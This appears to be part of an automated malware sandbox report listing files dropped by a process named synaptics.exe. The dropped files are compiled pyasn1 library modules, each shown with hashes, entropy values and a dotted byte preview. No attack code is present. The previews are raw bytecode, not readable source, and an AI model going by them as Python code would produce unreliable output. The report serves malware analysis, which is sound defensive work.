                                                                                                                                                                                                            Preview:o.......p..g.........................@...sb...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e.j...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.)......N)...error)...univc....................@...sd...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.e.j.f.d.d...Z.d.d.d...Z.e.d.d.....Z.e.j.d.d.....Z.d.d...Z.d.S.)...CachingStreamWrappera....Wrapper around non-seekable streams... Note that the implementation is tied to the decoder,. not checking for dangerous arguments for the sake. of performance... The read bytes are kept in an internal cache until. setting _markedPosition which may reset the cache.. c....................C...s....|.|._.t.....|._.d.|._.d.S...Nr....)..._raw..io..BytesIO.._cache.._markedPosition)...self..raw..r.....SC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\codec\streaming.py..__init__....s..........z.CachingStreamWrapper.__init__c....................C...s$...|...|...}.|.j...t.|.....t.j.....|.S...N)...readr......seek..len..os..SEEK_CUR).r......n
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                            Entropy (8bit):4.673691793083781
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:y/PvKGtuleh/wZWezouWAut+kiE2J5dj/a6iVWrzL19AXkcTgp:y/3KCqeh/w/o+uwkn23h/a/Ardm4
                                                                                                                                                                                                            MD5:480019FA44DF5AB973B639B7D3077F64
                                                                                                                                                                                                            SHA1:24741D0F2454DE7C6C22CCDD76313C9871C115CE
                                                                                                                                                                                                            SHA-256:08781A221DCF30B9B3ABAF63F371648F6E42C038D42CA0637032CE3BE77C40D9
                                                                                                                                                                                                            SHA-512:FF813F1FEF689618090E09287C04C5752CC335CF981C7BE3861946D4D503E09EFDAA54F9F0B2E17C92D8B5DB5F57F065DAF752F48B6B0FB8E278647680C34F32
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g;........................@...s....d.S.).N..r....r....r.....VC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\codec\ber\__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):42177
                                                                                                                                                                                                            Entropy (8bit):5.649154829662972
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:WWm8A/SzSYCTAE7rMi7Oj7KRXjT0DZESJDv/yY7cwel7+gkVy0/lpPUno7wwzY:WWbAqzSSEciqj7KRXjs7f+7MpKt
                                                                                                                                                                                                            MD5:2D6B2A6B22BCD613B5205E71DE646C4A
                                                                                                                                                                                                            SHA1:74509504B8FEDA197147FA12DA73C0DEF1EC7FB4
                                                                                                                                                                                                            SHA-256:FEBA1535D81308CA290FB42322C563759D14645D9BA8796EA7A473916F158BB6
                                                                                                                                                                                                            SHA-512:372C0C84D4191F5B3FEE49C0BCAF869A7FD82EB742EAA4BAE8E18838256D3253495A52DB0F3E554B1789B7965E9B05598B09DCE0311519AE37B3EDED8E10EFAF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..gX5.......................@...sT...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.e.j.e.e.j.d...Z.e.j.Z.e.j.Z.G.d.d...d.e ..Z!G.d.d...d.e!..Z"G.d.d...d.e"..Z#e#..Z$G.d.d...d.e"..Z%G.d.d...d.e%..Z&G.d.d...d.e"..Z'G.d.d ..d e"..Z(G.d!d"..d"e"..Z)G.d#d$..d$e"..Z*G.d%d&..d&e"..Z+G.d'd(..d(e"..Z,G.d)d*..d*e!..Z-G.d+d,..d,e-..Z.G.d-d...d.e...Z/G.d/d0..d0e/..Z0G.d1d2..d2e/..Z1G.d3d4..d4e...Z2G.d5d6..d6e2..Z3G.d7d8..d8e2..Z4G.d9d:..d:e...Z5G.d;d<..d<e"..Z6G.d=d>..d>e(..Z7G.d?d@..d@e(..Z8G.dAdB..dBe(..Z9G.dCdD..dDe(..Z:G.dEdF..dFe(..Z;G.dGdH..dHe(..Z<G.dIdJ..dJe(..Z=G.dKdL..dLe(..Z>G.dMdN..dNe(..Z?G.dOdP..dPe(..Z@G.dQdR..dRe(..ZAG.dSdT..dTe(..ZBG.dUdV..dVe(..ZCG.dWdX..dXe(..ZDi.e.jEjFe%....e.jGjFe&....e.jHjFe'....e.jIjFe(....e.jJjFe)....e.jKjFe*....e.jLjFe+....e.jMjFe%....e.jNjFe,....e.jOjFe/....e.jPjFe2....e.jQjF
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):790
                                                                                                                                                                                                            Entropy (8bit):5.122277133230522
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:PnsMN0EngkvZJW64GBSfPszRD3QWqSoFB6GU:fsinVQ6iMoPw
                                                                                                                                                                                                            MD5:BF6EBF02C0BD2BFBDBDF48D249C2BC50
                                                                                                                                                                                                            SHA1:259F6D87706B11A4C9098D2B97B98E911EC3FD6C
                                                                                                                                                                                                            SHA-256:D3738C000AA426E366B2B627E05367A1C44D5FA2BA2727DFB0C8E3CD3CC1BEFA
                                                                                                                                                                                                            SHA-512:F3AFD9807F531695E6BEFC3BF3D75F78679A7F66D3A74AE30CD0BE57267543904908F8F40ED2E6ED63BE8A69870AA0998ED4BF25B1BE121130374704D047EDAB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g.........................@...s:...d.d.l.m.Z...d.d.l.m.Z...d.g.Z.G.d.d...d.e.j...Z.e...Z.d.S.)......)...base)...tag..endOfOctetsc....................@...s4...e.Z.d.Z.d.Z.e...e...e.j.e.j.d.....Z.d.Z.d.d...Z.d.S.)...EndOfOctetsr....Nc....................O...s*...|.j.d.u.r.t.j.|.g.|...R.i.|.....|._.|.j.S.).N)..._instance..object..__new__)...cls..args..kwargs..r.....QC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\codec\ber\eoo.pyr........s..........z.EndOfOctets.__new__)...__name__..__module__..__qualname__Z.defaultValuer......initTagSet..Tag..tagClassUniversal..tagFormatSimple..tagSetr....r....r....r....r....r....r........s..................r....N)...pyasn1.typer....r......__all__..SimpleAsn1Typer....r....r....r....r....r......<module>....s..............
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                            Entropy (8bit):4.664699388198659
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:y/PvKGtuleh/wZWezouWAut+kiE2J5dj/a6iVWrzL18ygOkcTgp:y/3KCqeh/w/o+uwkn23h/a/Ard8Nu4
                                                                                                                                                                                                            MD5:C5928700354F759AD52E868D732C134A
                                                                                                                                                                                                            SHA1:ECEEB5CCF3F1AA4D1FDDEE2275E0F7C58820790A
                                                                                                                                                                                                            SHA-256:335E36FD4E2BA6B673A493638A652144043805D7D78E5B918A969C34A5DD9421
                                                                                                                                                                                                            SHA-512:BDFF81F95705A81A3EA8347D1835496E3A5FEF319C399593781DEA6E38A4CED14F9F229D049C193378472661DFEE78959F8BFB0FBCCA2B6C010CA676EE7BA74C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g;........................@...s....d.S.).N..r....r....r.....VC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\codec\cer\__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2510
                                                                                                                                                                                                            Entropy (8bit):5.399967254791454
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:fz8iXwFKzH/u19DflQ6ePi8clOVaJORi6Zy0punszpDVYRB:fz5XTfcfggEaJONNpunszp5K
                                                                                                                                                                                                            MD5:D46B94A5E6C242C9F884CD9AB89789C5
                                                                                                                                                                                                            SHA1:09DD917766CE99A9D0DF70A3E5674E24E4D29B49
                                                                                                                                                                                                            SHA-256:8622D265F628F1934E5CD9D3AE374483BECAA89A3EEA07AB51419E224007E435
                                                                                                                                                                                                            SHA-512:AEDBF0311E90A17D194E45F6C7431CD9E306C3FB437AB208E1A84BAFD93405C9198DCA0C1F4FD081304C96761993EFD06C8A74484AB01F894C994E09556234BD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g.........................@...s8...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.g.Z.e.j.Z.G.d.d...d.e.j...Z.e.j.Z.e.j.Z.e.j.Z.e.j.....Z.e...e.j.j.e...e.j.j.e...e.j.j.e...e.j.j.e...i.....e.j.....Z.e.....D.].Z.e.j.d.u.rte.j.j.j.Z.e.d.u.rte.e.v.rte.e.e.<.q\G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j ..Z e ..Z!d.e"f.d.d...Z#d.S.)......N)...error)...readFromStream)...decoder)...univ..decode..StreamingDecoderc....................@...s$...e.Z.d.Z.e...d...Z.....d.d.d...Z.d.S.)...BooleanPayloadDecoderr....Nc....................k...s......|.d.k.r.t...d.....t.|.|.|...D.].}.t.|.t...r.|.V...q.|.d...}.|.d.k.r&d.}.n.|.d.k.r-d.}.n.t...d.|.......|.j.|.|.|.f.i.|.....V...d.S.).N.....z Not single-octet Boolean payloadr.........z.Unexpected Boolean payload: %s).r....Z.PyAsn1Errorr......isinstance..SubstrateUnderrunErrorZ._createComponent)...selfZ.substrateZ.asn1Spec..tagSet..length..stateZ.decodeFunZ.substrateFun..options..chunk..byte..value..r.....UC:\Users\user\AppData\Lo
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                            Entropy (8bit):4.666735857341677
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:y/PvKGtuleh/wZWezouWAut+kiE2J5dj/a6iVWrzL17BOkcTgp:y/3KCqeh/w/o+uwkn23h/a/Ard04
                                                                                                                                                                                                            MD5:AD46CB0EF838B65032FF9A4BA577267E
                                                                                                                                                                                                            SHA1:D94096451D0A8B6675B0F3562F889556DA2584A0
                                                                                                                                                                                                            SHA-256:D022786AB0F3DEABB48146FE7C45D800173C6B64DDF012E3B6010792F3D54672
                                                                                                                                                                                                            SHA-512:5758396A3B4D1FCC307D175142C7AD31A9571294D4FB9F4B801EC803498D30082FF295E22005CC7A1F290A008233953234B170BA38A4C16A6D923E9B3319B24D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g;........................@...s....d.S.).N..r....r....r.....VC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\codec\der\__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1877
                                                                                                                                                                                                            Entropy (8bit):5.13163452253019
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:ljM1Beausa5bi6PPeJZsf2NLPKcDP4h8bM8rc6826aFQc6ZLCJckPyhvc4J4XQC1:6NkiuPEiAzHDwmPrS216ZOcBzAn1
                                                                                                                                                                                                            MD5:181B537788F91E1C1202C03D4C4BF63E
                                                                                                                                                                                                            SHA1:D70D4A8148F693705BDDCD2D3240275F62884279
                                                                                                                                                                                                            SHA-256:ABADFEA6E07931D6611C9024553D535C3960C0B2164611460F74E6586017AC81
                                                                                                                                                                                                            SHA-512:EEAB67CBD5892F4DBA8C2D68A3464CEAE1528F00856345B611D73318803AC89FE80ED4E78495F76AF85F673C88E6082EDE87B505F0768DFD76B0BA67359F1A6E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..gd........................@...s....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.g.Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.e.j.Z.e.j.....Z.e...e.j.j.e...e.j.j.e...e.j.j.e...i.....e.j.....Z.e.....D.].Z.e.j.d.u.rce.j.j.j.Z.e.d.u.rce.e.v.rce.e.e.<.qKG.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.e...Z.d.e.f.d.d...Z.d.S.)......N)...decoder)...univ..decode..StreamingDecoderc....................@........e.Z.d.Z.d.Z.d.S.)...BitStringPayloadDecoderFN....__name__..__module__..__qualname__Z.supportConstructedForm..r....r.....UC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\codec\der\decoder.pyr.................r....c....................@...r....)...OctetStringPayloadDecoderFNr....r....r....r....r....r........r....r....c....................@...s ...e.Z.d.Z.e.j.j.Z.e.Z.e.Z.d.Z.d.S.)...SingleItemDecoderFN).r....r....r....r....r......__doc__..TAG_MAP..TYPE_MAPZ.supportIndefLengthr....r....r....r....r....+...s..............r....c....................@........e.Z.d.Z.e.j.j.Z.e.Z.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):197
                                                                                                                                                                                                            Entropy (8bit):4.926613856737506
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:y/3Cqev/UlcrfllhZDwkn23h/a/ArdaDuR:C3Cqev/XNlh+fsraR
                                                                                                                                                                                                            MD5:D0770D7312996C190E4F3213622D28D5
                                                                                                                                                                                                            SHA1:5D452302D9E32AB7B38E07E4FFD33456035545AF
                                                                                                                                                                                                            SHA-256:7819421B22D514DC5A12650F977581425283ADE8907EB9C7CDD376DF92F3C944
                                                                                                                                                                                                            SHA-512:4ED23E9799491F01D4545E9B29DE23A8888411E1FB8BC346DF24A16F59739951F18D9FE9764B3F618C23695E59AE3D03D577C749ACEFC4EE4CDC4767817F03F7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..gp........................@...s....e...Z.d.S.).N)...objectZ._MISSING..r....r.....SC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\compat\__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):431
                                                                                                                                                                                                            Entropy (8bit):4.9511440555938435
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:C3PXrC664jlsSuD2TZmfsr1lA0ikdOZqqJ:6PaSU28f8ykUZqqJ
                                                                                                                                                                                                            MD5:73E023C0FF10D946A940FB5460990218
                                                                                                                                                                                                            SHA1:BA55143E652EA41FE90AE20D9A517872B8043FFE
                                                                                                                                                                                                            SHA-256:8F114001EEA90228B245ABDFE3BE612975E0FBCB66189D75BD9A4794D67F58CF
                                                                                                                                                                                                            SHA-512:A3794F15402EFD1283E839C83FAD269A429575D6383D0B3D10B2C027112FD3492DF54E078CDB6A17E56770ACEB79F40040904126D87D397FFFA55252959C46F2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g.........................@...s....d.d.d...Z.d.S.).F.....c....................C...sJ...t.|.....|...}.|.r.|.d...d.k.r.|.d.7.}.|.j.|.d...|.d...r.d.p.d...d.|.d...S.).N.....r...........big)...signed)...max..bit_length..to_bytes)...valuer......length..r.....RC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\compat\integer.pyr........s..........$.r....N).Fr....).r....r....r....r....r......<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):174
                                                                                                                                                                                                            Entropy (8bit):4.6371759219341815
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:y/PvKGtuleh/wZWe05Ot+kiE2J5dj/a6iVWrzL1KLLikcTgp:y/3KCqeh/wpwkn23h/a/ArdKLLy4
                                                                                                                                                                                                            MD5:3CDB1C6D8E58D666ACAC66705D25283E
                                                                                                                                                                                                            SHA1:D667B295D775503637DC4ECB73C3526B57A01809
                                                                                                                                                                                                            SHA-256:1B1A2E42E41005337B8BFC266ECA34AA1264A4C11633E5AD5C2875B6B96976D9
                                                                                                                                                                                                            SHA-512:DB55606A0F614777FD1B46583817482246B563C345C5DE8F4396DE10C2CD2E6D4DAC1C19A6D8B956635753B35C542176A50B13F6F866A827FC37F96515A42DC3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g;........................@...s....d.S.).N..r....r....r.....QC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\type\__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):21834
                                                                                                                                                                                                            Entropy (8bit):5.253950363568355
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:Qd+3khvV7gSPy9VQYmqBB00ygJxUxWmOIwWbV+AgSbCiFFQQVXycnSQ1MtWdtcVo:QMkhvV7gSPy9VQYmqBB00ygfUxWmOIwY
                                                                                                                                                                                                            MD5:20CC8878EF1BC80E05F472B4372636A4
                                                                                                                                                                                                            SHA1:1FCCB251A5E1BD02E9A57F6FDCA1DC924ECDD282
                                                                                                                                                                                                            SHA-256:9DA08C4D8106BD0D1C234BF18E4A3AFD2BBCBB3CE1830A7D323D1DE9089A8548
                                                                                                                                                                                                            SHA-512:25B74529809F21408E149DE2949FCFA78BEB3F4AF9F067833C19E11FFEF9D7875865F232B8BFA1094D96B6AB3D3F23ED93C346206C518E5EF04FEA8DC8AD4F8F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g"V.......................@...s....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e.Z.G.d.d...d.e...Z.e...Z.G.d.d...d.e...Z.e.Z.G.d.d...d.e...Z.e.Z.d.S.)......N)...error)...constraint)...tag)...tagmap)...Asn1Item..Asn1Type..SimpleAsn1Type..ConstructedAsn1Typec....................@...s....e.Z.d.Z.e.d.d.d.....Z.d.S.).r.........c....................C...s4...z.t...j.|.7..._.W.t.j.S...t.y.......|.t._.Y.t.j.S.w...N).r....Z._typeCounter..AttributeError)...cls..increment..r.....MC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\type\base.py..getTypeId....s..................z.Asn1Item.getTypeIdN).r....)...__name__..__module__..__qualname__..classmethodr....r....r....r....r....r........s..........r....c....................@...s....e.Z.d.Z.d.Z.e.....Z.e.....Z.d.Z.d.d...Z.d.d...Z.d.d...Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.d#d.d...Z.d#d.d...Z.e.d.d.....Z.d$d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d ..Z.d!d"..Z.d.S.)%r....a>...Base
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5603
                                                                                                                                                                                                            Entropy (8bit):5.106562247932023
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:ThAsswL3b31sUQblFm1dSGaL4in/lqaW5P3ftlSCowp9yQu9MURWu3nph9K:tAsbz1s9bn3GaEicaWR3f2+9ruSURWu8
                                                                                                                                                                                                            MD5:167C2E03D59CE9DA6BBEEB69B9C6FEA7
                                                                                                                                                                                                            SHA1:E98FFCD93B428AC8A191ED121262DE19C18A6322
                                                                                                                                                                                                            SHA-256:DF1882F3E74E2F63B1305D396206500271064F664323B2C632902DF8936CEC2E
                                                                                                                                                                                                            SHA-512:0DB0F678AD69903A4CE8F39F564C1A0668F336B795361E19E33A9951FD48EDDAAAC19BC4B7A9FA8AA7D2BA845E5053657E7B8B1B0A7F8D1E69D78108E984884C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g.$.......................@...s&...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.e.j.Z.e.j.Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d d!..d!e...Z.d.S.)".....N)...error)...tag)...univ)...NumericString..PrintableString..TeletexString..T61String..VideotexString..IA5String..GraphicString..VisibleString..ISO646String..GeneralString..UniversalString..BMPString..UTF8Stringc....................@...sV...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.S.)...AbstractCharacterStringa....Creates |ASN.1| schema or value object... |ASN.1| class is based on :class:`~pyasn1.type.base.SimpleAsn1Type`,. its objects are immutable and duck-type :class:`bytes`.. When used in octet-stream context, |ASN.1| type assumes. "|encoding|" encoding... Keyword Args. -----------
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):23718
                                                                                                                                                                                                            Entropy (8bit):5.134142337196262
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:WYM3gCqqRCO/Wsd9fTiuYOseVCTet2K4fnORtAlxkVUjNptXeW8na+MVMru:xDCNRDxBGlO3VmrfnORtUkC1eW6XMVMi
                                                                                                                                                                                                            MD5:5E2B0B815057E853C85DD0AB33EA4329
                                                                                                                                                                                                            SHA1:64D764D3331AF16573DBEA7C62ACCA2CC149260C
                                                                                                                                                                                                            SHA-256:5F2121649049378051562CBEF807BA58FE9B337E5A5B8E54A8387AE977D594E9
                                                                                                                                                                                                            SHA-512:A0D9AAF9308307192D55E5C117262CF366FA97E40D9D2526742A691B4441BC11DD9885D1FAD426B4A18D8F6F96611490A6A583CC69B272CD771FC8E83F7A491A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g.U.......................@...s....d.d.l.Z.d.d.l.m.Z...g.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.) .....N)...error)...SingleValueConstraint..ContainedSubtypeConstraint..ValueRangeConstraint..ValueSizeConstraint..PermittedAlphabetConstraint..InnerTypeConstraint..ConstraintsExclusion..ConstraintsIntersection..ConstraintsUnionc....................@...s....e.Z.d.Z.d.d...Z.d"d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d.S.)#..AbstractConstraintc....................G...s*...t...|._.|...|.....t.|.j.j.|.j.f...|._.d.S...N)...set.._valueMap.._setValues..hash..__class__..__name__.._values.._AbstractConstraint__hash....self..values..r.....SC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\type\constraint.py
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):390
                                                                                                                                                                                                            Entropy (8bit):4.758663632598017
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:y/3mFYNbsu3gMlCep2AInXx9YLIKP66GS9o7Iwkn23h/a/ArdKxqXKUeh/QGD7/w:C3mqNQEgYCeeQ2nfsxxsneh/j7/W+ho
                                                                                                                                                                                                            MD5:79D79F8D6173CF8A62A6F388E0675806
                                                                                                                                                                                                            SHA1:B3A4B5E1FF2F938EDD63E7F31698277502521400
                                                                                                                                                                                                            SHA-256:05215BA9DAFBE0BF1487B06DA3039BF7A6EDEB0A469BBCA4E2EE730F90F03912
                                                                                                                                                                                                            SHA-512:C6C6DEDB9BF3FDF8AC4C46D5068F332A8C4316801FE104EEBD1C6C023F472C59514FB6CDB9B9CB67D2C0FF5BDF1A44C734BF00AF2D1E82EA52636D9AF033B4A1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g.........................@...s ...d.d.l.m.Z...G.d.d...d.e...Z.d.S.)......)...PyAsn1Errorc....................@...s....e.Z.d.Z.d.S.)...ValueConstraintErrorN)...__name__..__module__..__qualname__..r....r.....NC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\type\error.pyr........s........r....N).Z.pyasn1.errorr....r....r....r....r....r......<module>....s........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):18341
                                                                                                                                                                                                            Entropy (8bit):5.141476386190373
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:gsQFORXOxlx+se3L2qeWNqb4UF1ducijQxfA3HtADIrt:qF6ql8sgL2HWNq8UF1ducijQxf2rt
                                                                                                                                                                                                            MD5:14A534108EBBBDA470813FFB6A442602
                                                                                                                                                                                                            SHA1:F4C0A904E8373C1245CCC4E8514BCC0892AB328D
                                                                                                                                                                                                            SHA-256:6123CA33FD5E767278A2652EFAEA7329522222D908029EA137A85DEF9FB3A01F
                                                                                                                                                                                                            SHA-512:84C88AF5FA5E1DBE068B709350336E8CB8E51830EB2E869BA9643A42CCB835385559B63CE009F5479A13C1D6163689DA389C0C4A77E838BC3F2398C27B913004
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g3?.......................@...sx...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.)......N)...error)...tag)...tagmap)...NamedType..OptionalNamedType..DefaultedNamedType..NamedTypesc....................@...s....e.Z.d.Z.d.Z.d.Z.d.Z.d$d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.d d!..Z.d"d#..Z.d.S.)%r....a....Create named field object for a constructed ASN.1 type... The |NamedType| object represents a single name and ASN.1 type of a constructed ASN.1 type... |NamedType| objects are immutable and duck-type Python :class:`tuple` objects. holding *name* and *asn1Object* components... Parameters. ----------. name: :py:class:`str`. Field name.. asn1Object:. ASN.1 type object. FNc....................C...s ...|.|._.|.|._.|.|.f.|._.|.|._.d.S...N)..._NamedType__name.._NamedType__type.._NamedType__na
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5482
